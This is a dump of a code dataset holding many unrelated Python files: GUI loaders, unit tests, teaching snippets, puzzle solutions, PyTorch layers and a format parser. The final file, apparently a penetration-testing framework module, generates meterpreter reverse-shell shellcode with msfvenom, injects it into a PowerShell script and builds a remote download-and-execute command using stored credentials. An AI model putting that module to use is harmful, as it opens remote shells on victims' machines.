content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
import numpy as np
import sys
from PyQt5 import QtCore, QtGui, QtWidgets
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider, Button #, RadioButtons
import scipy.signal as ss
from binary_file_options import Ui_MainWindow
def get_raw_data_from_binary_file(fname,offset_samples,duration_samples,bit_depth,num_of_channels):
f=open(fname,'rb')
offset_bytes=offset_samples*(bit_depth//8)*num_of_channels
# print(offset_bytes)
f.seek(offset_bytes,0)
data_raw=f.read(int(duration_samples*int(bit_depth/8)*num_of_channels))
f.close()
return data_raw
def raw_to_complex_volts(data_raw,nc,v_range,bit_depth=16):
if bit_depth==16:
data=np.fromstring(data_raw,dtype=np.int16)
data=np.reshape(data,(nc,int(len(data_raw)/nc/2)),'F')*v_range/32767
data_complex=np.zeros((int(nc/2),int(len(data_raw)/nc/2)),dtype=np.complex128)
for i in range(int(nc/2)):
data_complex[i,:]=data[2*i,:]+1j*data[2*i+1,:]
elif bit_depth==32:
data=np.fromstring(data_raw,dtype=np.int32)
data=np.reshape(data,(nc,int(len(data_raw)/nc/4)),'F')*v_range/2147483647
data_complex=np.zeros((int(nc/2),int(len(data_raw)/nc/4)),dtype=np.complex128)
for i in range(int(nc/2)):
data_complex[i,:]=data[2*i,:]+1j*data[2*i+1,:]
return data_complex
def main():
app = QtWidgets.QApplication(sys.argv)
fname = QtWidgets.QFileDialog.getOpenFileName(None, "Load binary file:", "", "Binary files (*.bin *.raw);; All files (*.*)")
print(fname)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
# app = QtWidgets.QApplication(sys.argv)
# window = SeeProcessing()
# window.show()
# app.exec_()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
python
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
import copy
import warnings
import Axon.Ipc
#local imports
from background import background
from componentWrapperInput import componentWrapperInput
from componentWrapperOutput import componentWrapperOutput
print background
import time
DEFIN = ["inbox", "control"]
DEFOUT = ["outbox", "signal"]
class likefile(object):
"""An interface to the message queues from a wrapped component, which is activated on a backgrounded scheduler."""
def __init__(self, child, extraInboxes = (), extraOutboxes = (), wrapDefault = True):
print background
if background.lock.acquire(False):
background.lock.release()
raise AttributeError, "no running scheduler found."
# prevent a catastrophe: if we treat a string like "extrainbox" as a tuple, we end up adding one new inbox per
# letter. TODO - this is unelegant code.
if not isinstance(extraInboxes, tuple):
extraInboxes = (extraInboxes, )
if not isinstance(extraOutboxes, tuple):
extraOutboxes = (extraOutboxes, )
# If the component to wrap is missing, say, "inbox", then don't fail but silently neglect to wrap it.
validInboxes = type(child).Inboxes.keys()
validOutboxes = type(child).Outboxes.keys()
inboxes = []
outboxes = []
if wrapDefault:
for i in DEFIN:
if i in validInboxes: inboxes.append(i)
for i in DEFOUT:
if i in validOutboxes: outboxes.append(i)
inboxes += list(extraInboxes)
outboxes += list(extraOutboxes)
try: inputComponent = componentWrapperInput(child, inboxes)
except KeyError, e:
raise KeyError, 'component to wrap has no such inbox: %s' % e
try: outputComponent = componentWrapperOutput(child, inputComponent, outboxes)
except KeyError, e:
del inputComponent
raise KeyError, 'component to wrap has no such outbox: %s' % e
self.inQueues = copy.copy(inputComponent.inQueues)
self.outQueues = copy.copy(outputComponent.outQueues)
# reaching into the component and its child like this is threadsafe since it has not been activated yet.
self.inputComponent = inputComponent
self.outputComponent = outputComponent
inputComponent.activate()
outputComponent.activate()
self.alive = True
# methods passed through from the queue.
def empty(self, boxname = "outbox"):
"""Return True if there is no data pending collection on boxname, False otherwise."""
return self.outQueues[boxname].empty()
def qsize(self, boxname = "outbox"):
"""Returns the approximate number of pending data items awaiting collection from boxname. Will never be smaller than the actual amount."""
return self.outQueues[boxname].qsize()
def get_nowait(self, boxname = "outbox"):
"""Equivalent to get(boxname, False)"""
return self.get(boxname, blocking = False)
def anyReady(self):
names = []
for boxname in self.outQueues.keys():
if self.qsize(boxname):
names.append(boxname)
if names != []:
return names
return None
def get(self, boxname = "outbox", blocking = True, timeout = 86400):
"""Performs a blocking read on the queue corresponding to the named outbox on the wrapped component.
raises AttributeError if the likefile is not alive. Optional parameters blocking and timeout function
the same way as in Queue objects, since that is what's used under the surface."""
print "self.get boxname ",boxname,"blocking =",blocking,"timeout=",timeout
if self.alive:
return self.outQueues[boxname].get(blocking, timeout)
# TODO - remove this.
# Specifying any timeout allows ctrl-c to interrupt the wait, even if the timeout is excessive.
# This is one day. this may be a problem, in which case retry after an "empty" exception is raised.
else: raise AttributeError, "shutdown was previously called, or we were never activated."
def put(self, msg, boxname = "inbox"):
"""Places an object on a queue which will be directed to a named inbox on the wrapped component."""
print "self.put msg", repr(msg), "boxname", boxname
if self.alive:
queue = self.inQueues[boxname]
queue.put_nowait(msg)
self.inputComponent.whatInbox.put_nowait(boxname)
else: raise AttributeError, "shutdown was previously called, or we were never activated."
def shutdown(self):
"""Sends terminatory signals to the wrapped component, and shut down the componentWrapper.
will warn if the shutdown took too long to confirm in action."""
# TODO - what if the wrapped component has no control box?
if self.alive:
self.put(Axon.Ipc.shutdown(), "control") # legacy support.
self.put(Axon.Ipc.producerFinished(), "control") # some components only honour this one
self.put(Axon.Ipc.shutdownMicroprocess(), "control") # should be last, this is what we honour
else:
raise AttributeError, "shutdown was previously called, or we were never activated."
self.inputComponent.isDead.wait(1)
if not self.inputComponent.isDead.isSet(): # we timed out instead of someone else setting the flag
warnings.warn("Timed out waiting on shutdown confirmation, may not be dead.")
self.alive = False
def __del__(self):
if self.alive:
self.shutdown()
if __name__ == "__main__":
if 1:
# So, does this code actually work? Or not?
import time
from Kamaelia.Protocol.HTTP.HTTPClient import SimpleHTTPClient
class Foing(Axon.Component.component):
def main(self):
while True:
print "."
bg = background().start()
time.sleep(1)
p = likefile(SimpleHTTPClient())
p.put("http://google.com")
p.put("http://slashdot.org")
print "X"
google = p.get()
print "Y"
slashdot = p.get()
print "Z"
time.sleep(1)
print "google is", len(google), "bytes long, and slashdot is", len(slashdot), "bytes long."
p.shutdown()
|
python
|
from goolabs import GoolabsAPI
import time
def name_check(api_id, text_list):
"""固有表現抽出器で名前と判断された語のリストを取得
Parameters
----------
api_id : str
text_list : list[str]
ツイッターの文章のリスト
Returns
-------
name_list : list[str]
名前と判断された語(重複あり)
"""
n_list = ["鬼太郎", "ぬらりひょん", "コナン", "金田一", "モリアーティー", "ホームズ",
"水谷隼", "張本智和", "石川佳純", "丹羽孝希", "陳夢", "馬龍", "伊藤美誠", "宇田幸矢", "許キン",
"ロナウド", "リオネルメッシ", "リオネル・メッシ", "本田圭佑", "香川真司", "内田篤人", "三浦知良", "長友佑都",
"イチロー", "王貞治", "大谷翔平", "星野仙一",
]
name_list = []
api = GoolabsAPI(api_id)
for i in range(int(len(text_list)/100)+1):
if i != int(len(text_list)/100):
text = "".join(text_list[i*100:(i+1)*100])
elif len(text_list)%100 != 0:
text = "".join(text_list[i*100:])
ne_list = api.entity(sentence=text, class_filter="PSN")["ne_list"]
for name in ne_list:
if name[0] not in n_list:
name_list.append(name[0])
time.sleep(1)
return name_list
def main():
tweet_list = joblib.load("twitter_result2")
name_check("", tweet_list)
return
if __name__ == "__main__":
main()
|
python
|
from django.contrib import admin
from .models import HeaderCTA, BlogEmbeddedCTA
# Register your models here.
admin.site.register(HeaderCTA)
admin.site.register(BlogEmbeddedCTA)
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 24 21:08:15 2019
@author: Olivier
"""
#####prévoir le résultat avant d'exécuter le code#######
a=3
def test0():
"""None->None
affiche a, variable non déclarée dans la fonction"""
print("valeur de a dans test0",a)
test0() #attention, si a n'est pas init. en ligne 9, test0 provoque une erreur !
#####prévoir le résultat avant d'exécuter le code#######
def test1(a):
"""int->None
modifie la valeur de a, variable locale sans la retourner"""
a=1
print("valeur de a dans test1",a,id(a))
print("avant test1",a,id(a))
test1(a)
print("après appel de test1",a,id(a))
#####prévoir le résultat avant d'exécuter le code#######
def test2(a):
"""int->int
modifie la valeur de la variable locale a et la retourne"""
print("valeur de a dans test2",a,id(a))
a=4
print("nouvelle valeur de a dans test2",a,id(a))
return a
a=test2(a)
print("après appel de test2",a,id(a))
#####prévoir le résultat avant d'exécuter le code#######
def test3():
"""None->None
modifie la valeur de a (variable globale)"""
b=10
test3()
try :
print("b = ",b) #provoque une erreur car b n'existe pas en dehors de test3
except (NameError):
print("b n'existe pas et ne peut donc pas être affiché")
#####prévoir le résultat avant d'exécuter le code#######
def test4():
"""None->None
modifie la valeur de a (variable globale)"""
global a
print("valeur de a dans test4",a,id(a))
a=5
print("nouvelle valeur de a dans test4",a,id(a))
test4()
print("après appel de test4",a,id(a))
|
python
|
import socket
from unittest import TestCase
from tempfile import NamedTemporaryFile
from mock import patch, Mock
from oasislmf.utils.conf import load_ini_file, replace_in_file
from oasislmf.utils.exceptions import OasisException
class LoadInIFile(TestCase):
def test_values_are_bool___values_are_correctly_converted_to_bool_value(self):
with NamedTemporaryFile(mode='w') as f:
f.writelines([
'[section]\n',
'a = True\n',
'b = False\n',
])
f.flush()
conf = load_ini_file(f.name)
self.assertTrue(conf['a'])
self.assertFalse(conf['b'])
def test_values_are_int___values_are_correctly_converted_to_int_value(self):
with NamedTemporaryFile(mode='w') as f:
f.writelines([
'[section]\n',
'a = 1\n',
'b = 2\n',
])
f.flush()
conf = load_ini_file(f.name)
self.assertEqual(1, conf['a'])
self.assertEqual(2, conf['b'])
def test_values_are_float___value_are_correctly_converted_to_int_value(self):
with NamedTemporaryFile(mode='w') as f:
f.writelines([
'[section]\n',
'a = 1.1\n',
'b = 2.2\n',
])
f.flush()
conf = load_ini_file(f.name)
self.assertEqual(1.1, conf['a'])
self.assertEqual(2.2, conf['b'])
def test_values_are_ip_addresses___values_are_converted_into_ip_string_format(self):
with NamedTemporaryFile(mode='w') as f:
f.writelines([
'[section]\n',
'a = 127.0.0.1\n',
'b = 127.127.127.127\n',
])
f.flush()
conf = load_ini_file(f.name)
ipf = lambda s: socket.inet_ntoa(socket.inet_aton(s))
self.assertEqual(ipf('127.0.0.1'), conf['a'])
self.assertEqual(ipf('127.127.127.127'), conf['b'])
def test_values_are_string_values___values_are_unchanged(self):
with NamedTemporaryFile(mode='w') as f:
f.writelines([
'[section]\n',
'a = first.value\n',
'b = another value\n',
])
f.flush()
conf = load_ini_file(f.name)
self.assertEqual('first.value', conf['a'])
self.assertEqual('another value', conf['b'])
def test_io_error_is_raised_when_opening_file___exception_is_converted_to_oasis_exception(self):
def raising_function(*args, **kwargs):
raise IOError()
with patch('io.open', Mock(side_effect=raising_function)), self.assertRaises(OasisException):
load_ini_file('file_name')
class ReplaceInFile(TestCase):
def test_more_var_names_are_given_than_values___error_is_raised(self):
with self.assertRaises(OasisException):
replace_in_file('first_path', 'second_path', ['fist_arg', 'second_arg'], ['first_val'])
def test_more_var_values_are_given_than_values___error_is_raised(self):
with self.assertRaises(OasisException):
replace_in_file('first_path', 'second_path', ['fist_arg'], ['first_val', 'second_val'])
def test_input_file_does_not_include_any_var_names___file_is_unchanged(self):
with NamedTemporaryFile(mode='w') as input_file, NamedTemporaryFile(mode='r') as output_file:
input_file.writelines([
'some_var some_val\n',
])
input_file.flush()
replace_in_file(input_file.name, output_file.name, ['first_arg', 'second_arg'], ['first_val', 'second_val'])
output_file.seek(0)
data = output_file.read()
self.assertEqual('some_var some_val\n', data)
def test_input_file_includes_some_var_names___input_names_are_replaced_with_values(self):
with NamedTemporaryFile(mode='w') as input_file, NamedTemporaryFile(mode='r') as output_file:
input_file.writelines([
'some_var first_arg\n',
])
input_file.flush()
replace_in_file(input_file.name, output_file.name, ['first_arg', 'second_arg'], ['first_val', 'second_val'])
output_file.seek(0)
data = output_file.read()
self.assertEqual('some_var first_val\n', data)
def test_io_error_is_raised_when_opening_file___exception_is_converted_to_oasis_exception(self):
def raising_function(*args, **kwargs):
raise IOError()
with patch('io.open', Mock(side_effect=raising_function)), self.assertRaises(OasisException):
replace_in_file('in', 'out', ['first_arg', 'second_arg'], ['first_val', 'second_val'])
def test_os_error_is_raised_when_opening_file___exception_is_converted_to_oasis_exception(self):
def raising_function(*args, **kwargs):
raise OSError()
with patch('io.open', Mock(side_effect=raising_function)), self.assertRaises(OasisException):
replace_in_file('in', 'out', ['first_arg', 'second_arg'], ['first_val', 'second_val'])
|
python
|
n = int(input())
ratings = [int(input()) for _ in range(n)]
candies = [1] * n
for i in range(1, n):
if ratings[i] > ratings[i-1]:
candies[i] = candies[i-1] + 1
#print (candies)
for i in reversed(range(1, n)):
if ratings[i] < ratings[i-1]:
candies[i-1] = max(candies[i-1], candies[i]+1)
print (sum(candies))
|
python
|
try:
from setuptools import setup, find_packages
except ImportError:
from distutils.core import setup
VERSION = '2.0.1'
setup(
name='usabilla-api',
version=VERSION,
description="Python client for Usabilla API",
license='MIT',
install_requires=['urllib3', 'requests'],
packages=find_packages(),
py_modules=['usabilla'],
author='Usabilla',
author_email='[email protected]',
url='https://github.com/usabilla/api-python',
download_url='https://github.com/usabilla/api-python/tarball/%s' % VERSION,
test_suite='tests'
)
|
python
|
import os
from shutil import copyfile
import lxml.etree as etree
os.chdir("../")
operating_system = 'Linux'
target_level_path = '../level_variations/generated_levels/fourth generation'
origin_level_path = '../buildgame/{}/9001_Data/StreamingAssets/Levels/novelty_level_1/type1/Levels/'.format(operating_system)
game_level_path = '9001_Data/StreamingAssets/Levels/novelty_level_1/type1/Levels/'.format(operating_system)
game_config_path = '../buildgame/{}/config.xml'.format(operating_system)
# each for each template, move 20 levels
hi_levels = os.listdir(target_level_path)
# remove all the levels in self.origin_level_path
old_levels = os.listdir(origin_level_path)
for old_level in old_levels:
os.remove(os.path.join(origin_level_path, old_level))
total_template_level_path = []
for level in hi_levels:
capabilites = os.listdir(os.path.join(target_level_path,level))
for capability in capabilites:
templates = os.listdir(os.path.join(target_level_path,level,capability))
for template in templates:
game_levels = os.listdir(os.path.join(target_level_path,level,capability,template))
for game_level in game_levels[:20]:
src_path = os.path.join(target_level_path,level,capability,template,game_level)
dst_path = os.path.join(origin_level_path, game_level)
copyfile(src_path, dst_path)
total_template_level_path.append(os.path.join(game_level_path, game_level))
parser = etree.XMLParser(encoding='UTF-8')
game_config = etree.parse(game_config_path, parser=parser)
config_root = game_config.getroot()
# remove old level path
for level in list(config_root[1][0][0]):
config_root[1][0][0].remove(level)
# add new level path
for l in total_template_level_path:
new_level = etree.SubElement(config_root[1][0][0], 'game_levels')
new_level.set('level_path', l)
# add a repeated level for the weird not loadding last level bug
new_level = etree.SubElement(config_root[1][0][0], 'game_levels')
new_level.set('level_path', l)
game_config.write(game_config_path)
|
python
|
from random import randint
number = randint(1, 100)
print("Guess a number between 1 and 100")
#print(number)
while True:
guess = int(input("Enter guess:"))
if guess < number:
print("Too low")
elif guess > number:
print("Too high")
else:
break
print("Correct!")
|
python
|
# DESCRIPTION
# You are a product manager and currently leading a team to develop a new product.
# Unfortunately, the latest version of your product fails the quality check.
# Since each version is developed based on the previous version, all the versions after a bad version are also bad.
# Suppose you have n versions [1, 2, ..., n] and you want to find out the first bad one,
# which causes all the following ones to be bad.
# You are given an API bool isBadVersion(version) which will return whether version is bad.
# Implement a function to find the first bad version. You should minimize the number of calls to the API.
# EXAMPLE:
# Given n = 5, and version = 4 is the first bad version.
# call isBadVersion(3) -> false
# call isBadVersion(5) -> true
# call isBadVersion(4) -> true
# Then 4 is the first bad version.
# The isBadVersion API is already defined for you.
# @param version, an integer
# @return a bool
# def isBadVersion(version):
class Solution:
'''
Time: O(LOG N), binary search
Space: O(1), no extra data structures
'''
def firstBadVersion(self, n):
"""
:type n: int
:rtype: int
"""
left = 0
right = n
# binary search iterative
# if the target has duplicate then this grabs the leftmost element
while left < right:
mid = left + (right - left) // 2
if isBadVersion(mid) == False:
left = mid + 1
else:
right = mid
return left
|
python
|
"""
Description: This script calibrate result from LP solution.
Probablistically select ASYMPs.
Then, compute metric features from those.
"""
from utils.networkx_operations import *
from utils.pandas_operations import *
from utils.time_operations import *
from tqdm import tqdm
import pandas as pd
import numpy as np
import copy
import argparse
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, matthews_corrcoef
def compute_metric_measures(ASYMP, ASYMP_pred):
accuracy = accuracy_score(ASYMP, ASYMP_pred)
precision = precision_score(ASYMP, ASYMP_pred)
recall = recall_score(ASYMP, ASYMP_pred)
f1 = f1_score(ASYMP, ASYMP_pred)
TP = (ASYMP & ASYMP_pred).sum()
MCC = matthews_corrcoef(ASYMP, ASYMP_pred)
return accuracy, precision, recall, f1, TP, MCC
def update_metric_arrays(idx_gamma, idx_beta, idx_alpha, idx_cnt):
accuracy_array[idx_gamma, idx_beta, idx_alpha, idx_cnt] = accuracy
precision_array[idx_gamma, idx_beta, idx_alpha, idx_cnt] = precision
recall_array[idx_gamma, idx_beta, idx_alpha, idx_cnt] = recall
f1_array[idx_gamma, idx_beta, idx_alpha, idx_cnt] = f1
TP_array[idx_gamma, idx_beta, idx_alpha, idx_cnt] = TP
MCC_array[idx_gamma, idx_beta, idx_alpha, idx_cnt] = MCC
n_ASYMP_array[idx_gamma, idx_beta, idx_alpha, idx_cnt] = n_ASYMP
if __name__ == "__main__":
gamma_list = [0, 16, 128]
beta_list = [1, 2, 4]
alpha_list = [0] + [pow(2, x) for x in range(9)]
x = 1
n_sample = 10
# here, n_sample+1 because we save one more set of ASYMP by choosing only those with y in sum prob = 1
accuracy_array = np.zeros((len(gamma_list), len(beta_list), len(alpha_list), n_sample))
precision_array = np.zeros((len(gamma_list), len(beta_list), len(alpha_list), n_sample))
recall_array = np.zeros((len(gamma_list), len(beta_list), len(alpha_list), n_sample))
f1_array = np.zeros((len(gamma_list), len(beta_list), len(alpha_list), n_sample))
TP_array = np.zeros((len(gamma_list), len(beta_list), len(alpha_list), n_sample)).astype(int)
MCC_array = np.zeros((len(gamma_list), len(beta_list), len(alpha_list), n_sample))
n_ASYMP_array = np.zeros((len(gamma_list), len(beta_list), len(alpha_list), n_sample)).astype(int)
for idx_gamma, gamma in enumerate(gamma_list):
for idx_beta, beta in enumerate(beta_list):
# if idx_gamma==2 and idx_beta==2:
# break
for idx_alpha, alpha in enumerate(alpha_list):
print("gamma: {}, beta: {}, alpha: {}".format(gamma, beta, alpha))
# print("Loading G...")
G = nx.read_graphml("data/G_synthetic_step2_beta{}_x{}_v3.graphml".format(int(beta), int(x)))
G = relabel_nodes_str_to_tuple(G)
# print(nx.info(G))
X = set([v for v in G.nodes() if G.nodes[v]["terminal"]])
len_X = len(X)
k = len_X
r = (0, -1)
add_dummy_node(G, r, 0.0, gamma)
G.nodes[r]["ASYMP"]=False
G.nodes[r]["ASYMP_pred"]=False
print("Update edge weights by subtracting scaled up the node weights")
W_over_k = alpha * sum([G.nodes[v]["prob"] for v in G.nodes()]) / k
for e in G.edges():
src = e[0]
dst = e[1]
weight = G.edges[src, dst]["weight"]
if dst in X:
adj_weight = weight + W_over_k
# print(G.nodes[dst]["prob"])
else:
adj_weight = weight - alpha * G.nodes[dst]["prob"]
G.edges[src, dst]["weight"] = adj_weight
ASYMP = np.array([G.nodes[v]["ASYMP"] for v in G.nodes()])
print("Loading G_solution...")
G_solution = nx.read_graphml("result/synthetic_LP_month1_beta{}_gamma{}_alpha{}_v3.graphml".format(int(beta), int(gamma), int(alpha)))
G_solution = relabel_nodes_str_to_tuple(G_solution)
print(nx.info(G_solution))
#################################################################################################
# Now select ASYMP probablistically.
sum_in_y_array = np.zeros((len(G)))
for idx, v in enumerate(G.nodes()):
if v in G_solution:
sum_in_y_array[idx] = sum([G_solution.edges[e]["flow"] for e in G_solution.in_edges(v)])
# some y value have 1.0000000000002 which cause error when calling function np.random.binomial
sum_in_y_array = np.clip(sum_in_y_array, 0, 1)
idx_cnt = 0
for i in range(10):
ASYMP_pred = np.random.binomial(1, sum_in_y_array).astype(bool)
# ASYMP_pred = ASYMP_pred | ASYMP_sampled
accuracy, precision, recall, f1, TP, MCC = compute_metric_measures(ASYMP, ASYMP_pred)
n_ASYMP = ASYMP_pred.sum()
print("nASYMP: {}, Acc: {:.3f}, Prec: {:.3f}, Rec: {:.3f}, f1: {:.3f}, TP: {}, MCC:{:.3f}".format(n_ASYMP, accuracy, precision, recall, f1, TP, MCC))
update_metric_arrays(idx_gamma, idx_beta, idx_alpha, idx_cnt)
idx_cnt += 1
# save results
print("Saving results as npz/LP/EXP1_LP.npz")
np.savez("npz/LP/EXP1_LP".format(int(x)),
accuracy_array=accuracy_array,
precision_array=precision_array,
recall_array=recall_array,
f1_array=f1_array,
TP_array=TP_array,
MCC_array=MCC_array,
n_ASYMP_array=n_ASYMP_array
)
|
python
|
import rubrik_cdm
rubrik = rubrik_cdm.Connect()
username = "python-sdk-read-only"
read_only_permission = rubrik.read_only_authorization(username)
|
python
|
import torch
import torch.nn as nn
import numpy as np
class AttentionGate(nn.Module):
def __init__(self, x_ch, g_ch, mid_ch, scale):
super(AttentionGate, self).__init__()
self.scale = scale
self.conv_g = nn.Conv2d(in_channels=g_ch, out_channels=mid_ch, kernel_size=1, bias=True)
self.conv_x = nn.Conv2d(in_channels=x_ch, out_channels=mid_ch, kernel_size=1, stride=scale)
self.relu = nn.ReLU(inplace=True)
self.conv_epsi = nn.Conv2d(in_channels=mid_ch, out_channels=1, kernel_size=1, bias=True)
self.sigm = nn.Sigmoid()
def forward(self, x, g):
attn = self.relu(self.conv_g(g) + self.conv_x(x))
attn = self.sigm(self.conv_epsi(attn))
return nn.functional.interpolate(attn, scale_factor=self.scale) * x
class JGenerate(nn.Module):
def __init__(self, epsilon=1e-4):
super(JGenerate, self).__init__()
self.epsilon = epsilon
def forward(self, A, t, I):
# self.epsilon = 1e-10
return (I - A)/(t + self.epsilon) + A
class BReLU(nn.Module):
def __init__(self, inplace=True):
super(BReLU, self).__init__()
# self.relu = nn.ReLU(inplace=inplace)
self.relu6 = nn.ReLU6(inplace=inplace)
def forward(self, x):
# out = self.relu(x)
# return 1 - self.relu(1 - out)
return self.relu6(6*x)/6
class DarkChannel(nn.Module):
def __init__(self, window_size):
super(DarkChannel, self).__init__()
self.mxpool = nn.MaxPool2d(kernel_size=window_size, stride=1, padding=(window_size-1)//2)
def forward(self, x):
neg_x_pooled = self.mxpool(-1*x)
return -1*(neg_x_pooled.max(dim=1, keepdim=True)[0])
def generate_mask(J, A, t, t_th, A_th, t_sl, A_sl, eps=1e-4):
# closer to one at unclear regions
t_relu = torch.nn.functional.sigmoid(t_sl*(t_th - t))
A_relu = torch.nn.functional.sigmoid(A_sl*((A / (J + eps)).mean(dim=1, keepdim=True) - A_th))
total_relu = t_relu * A_relu
return total_relu
def generate_J(I, A, t, eps=1e-4):
return (I - A)/(t + eps) + A
def correlation_coef(x, y):
vx = x - torch.mean(x, dim=(1, 2, 3), keepdim=True)
vy = y - torch.mean(y, dim=(1, 2, 3), keepdim=True)
return (torch.sum(vx * vy, dim=(1, 2, 3)) / (torch.sqrt(torch.sum(vx ** 2, dim=(1, 2, 3))) * torch.sqrt(torch.sum(vy ** 2, dim=(1, 2, 3))))).mean()
class EdgePreservingMSE(nn.Module):
def __init__(self, factor=0.1, std_dev=1.0):
super(EdgePreservingMSE, self).__init__()
self.mu = factor
eye = torch.eye(3).type(torch.DoubleTensor).unsqueeze(-1).unsqueeze(-1)
filter_size = 5
generated_filters = torch.from_numpy(np.array([[np.exp(-(ix*ix + iy*iy)/(2*std_dev*std_dev))/np.sqrt(2*np.pi*std_dev*std_dev)
for ix in range(-filter_size//2 + 1, filter_size//2 + 1)]
for iy in range(-filter_size//2 + 1, filter_size//2 + 1)], dtype=np.float64))
self.gaussian_filter = nn.Conv2d(in_channels=3, out_channels=3, kernel_size=filter_size, padding=(filter_size - 1)//2, bias=False)
self.gaussian_filter.weight.data.copy_(generated_filters*eye)
sobel_filter = torch.from_numpy(np.array([[1, 0, -1],
[2, 0, -2],
[1, 0, -1]], dtype=np.float64).reshape([1, 1, 3, 3])) * eye
self.sobel_filter_horizontal = nn.Conv2d(in_channels=3, out_channels=3, kernel_size=3, padding=1, bias=False)
self.sobel_filter_horizontal.weight.data.copy_(sobel_filter)
self.sobel_filter_vertical = nn.Conv2d(in_channels=3, out_channels=3, kernel_size=3, padding=1, bias=False)
self.sobel_filter_vertical.weight.data.copy_(sobel_filter.transpose(2, 3))
self.sobel_filter_vertical.weight.requires_grad = False
self.sobel_filter_horizontal.weight.requires_grad = False
self.gaussian_filter.weight.requires_grad = False
def forward(self, net_output, target):
with torch.no_grad():
blurred_img = self.gaussian_filter(target)
grad_x = self.sobel_filter_horizontal(blurred_img)
grad_y = self.sobel_filter_vertical(blurred_img)
factor = 1 + self.mu*torch.sqrt(grad_x ** 2 + grad_y ** 2)
return (factor*((net_output - target)**2)).mean()
class PReLU2sided(nn.Module):
def __init__(self, init_negative=0.1, init_positive=0.1):
super(PReLU2sided, self).__init__()
# self.relu = nn.ReLU(inplace=inplace)
self.relu = nn.PReLU(init=init_negative)
self.reversed_relu = nn.PReLU(init=init_positive)
def forward(self, x):
out = self.relu(x)
return 1 - self.reversed_relu(1 - out)
class LeakyReLU2sided(nn.Module):
def __init__(self, init_negative=0.01, init_positive=0.01, inplace=True):
super(LeakyReLU2sided, self).__init__()
# self.relu = nn.ReLU(inplace=inplace)
self.relu = nn.LeakyReLU(negative_slope=init_negative, inplace=inplace)
self.reversed_relu = nn.LeakyReLU(negative_slope=init_positive, inplace=inplace)
def forward(self, x):
out = self.relu(x)
return 1 - self.reversed_relu(1 - out)
class func_clamp_noderiv(torch.autograd.Function):
@staticmethod
def forward(ctx, i, min_val, max_val):
ctx._mask = (i.ge(min_val) * i.le(max_val))
return i.clamp(min_val, max_val)
@staticmethod
def backward(ctx, grad_output):
mask = torch.autograd.Variable(ctx._mask.type_as(grad_output.data))
return grad_output * mask, None, None
# return grad_output, None, None
|
python
|
"""
Loader and Parser for the txt format.
Version: 0.01-beta
"""
from konbata.Data.Data import DataNode, DataTree
from konbata.Formats.Format import Format
def txt_toTree(file, delimiter=None, options=None):
"""
Function transforms a txt file into a DataTree.
Parameters
----------
file: file
open input file in at least read mode
delimiter: TODO
options: list, optional
Returns
-------
tree: DataTree
"""
tree = DataTree(tree_type='txt')
# TODO add more options
# TODO add column or row storage
col0 = DataNode('')
for row in file.readlines():
col0.add(DataNode(row))
tree.root.add(col0)
return tree
def txt_fromTree(tree, file, options=None):
"""
Function transforms a DataTree into a csv file.
Parameters
----------
tree: DataTree
file: file
open output file in at least write mode
options: list, optional
"""
if not isinstance(tree, DataTree):
raise TypeError('tree must be type of DataTree')
output = tree.generate_string_representation()
file.writelines(output)
txt_format = Format('txt', [';', ','], txt_toTree, txt_fromTree)
|
python
|
from __future__ import print_function
from recon.core.module import BaseModule
import os
import subprocess
from libs.pentestlymodule import PentestlyModule
from libs.misc import parse_mimikatz, Colors
class Module(PentestlyModule):
meta = {
'name': 'Execute Mimikatz',
'author': 'Cory Duplantis (@ctfhacker)',
'description': 'Remotely downloads Invoke-Mimikatz.ps1 and executes via WMI.',
'query': 'SELECT username,password,domain,host FROM pentestly_creds WHERE success="True" AND execute!="False"',
'options': (
('LHOST', '', True, 'Target to connect back to'),
('RHOST', '', True, 'Target to connect to'),
),
}
def __init__(self, *args, **kwargs):
result = BaseModule.__init__(self, *args, **kwargs)
self.hosting_server = ''
self.new_script_name = '/root/.recon-ng/scripts/shellcode.ps1'
return result
def prep_shellcode(self, lhost):
'''Get a meterpreter completely in memory'''
with open('/root/.recon-ng/scripts/Invoke-Shellcode.ps1', 'r') as f:
script = f.read()
for arch,cmd in [('32', '/root/metasploit/msfvenom -p windows/meterpreter/reverse_https -f c EXITFUNC=thread LHOST={}'.format(lhost)),
('64', '/root/metasploit/msfvenom -p windows/x64/meterpreter/reverse_https -f c EXITFUNC=thread LHOST={}'.format(lhost))]:
print(cmd)
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Convert shellcode from \x00\x01\x02 -> 0x01,0x02,x03
shellcode = proc.communicate()[0]
# x86/x64 have different lengths of description before the shellcode.
# Dynamically determine how large that description
index = [index+1 for index,line in enumerate(shellcode.split('\n')) if 'unsigned char' in line][0]
self.output(index)
self.output('\n'.join(shellcode.split('\n')[:index]))
shellcode = ''.join(shellcode.split('\n')[index:])
shellcode = shellcode.split(';')[0]
shellcode = shellcode.replace('\n','')
shellcode = shellcode.replace('"','')
shellcode = ',0x'.join(shellcode.split('\\x'))[1:]
script = script.replace("REPLACEME{}".format(arch), shellcode)
self.output("Writing new Invoke-Shellcode script to {}".format(self.new_script_name))
with open(self.new_script_name, 'w') as f:
f.write(script)
def module_pre(self):
self.start_webserver()
self.test_execute()
def module_run(self, creds):
self.prep_shellcode(self.options['lhost'])
rhost = self.options['rhost'].replace(' ', '').split(',')
share = 'C$'
url='http://{}/{}'.format(self.hosting_server, self.new_script_name.split('/')[-1])
args = 'Invoke-Shellcode -Force'
command = self.powershell_download(script_url=url, args=args, post_url=self.hosting_server)
print(creds[0])
print(len(creds))
